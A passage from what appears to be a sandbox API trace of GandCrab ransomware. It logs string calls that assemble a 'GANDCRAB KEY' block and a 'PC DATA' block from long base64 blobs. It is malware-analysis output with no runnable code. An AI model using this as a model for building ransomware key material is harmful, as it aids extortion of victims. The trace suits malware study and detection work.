KSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---" [0040.775] lstrcatW (in: lpString1="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---", lpString2="\r\n" | out: lpString1="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\n") returned="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\n" [0040.775] lstrlenW (lpString="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\n") returned 2327 [0040.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2ed0000, cbMultiByte=-1, lpWideCharStr=0x2ee122e, cchWideChar=589 | out: lpWideCharStr="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 589 [0040.775] lstrcatW (in: lpString1="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=", lpString2="\r\n" | out: lpString1="---BEGIN GANDCRAB KEY---\r\n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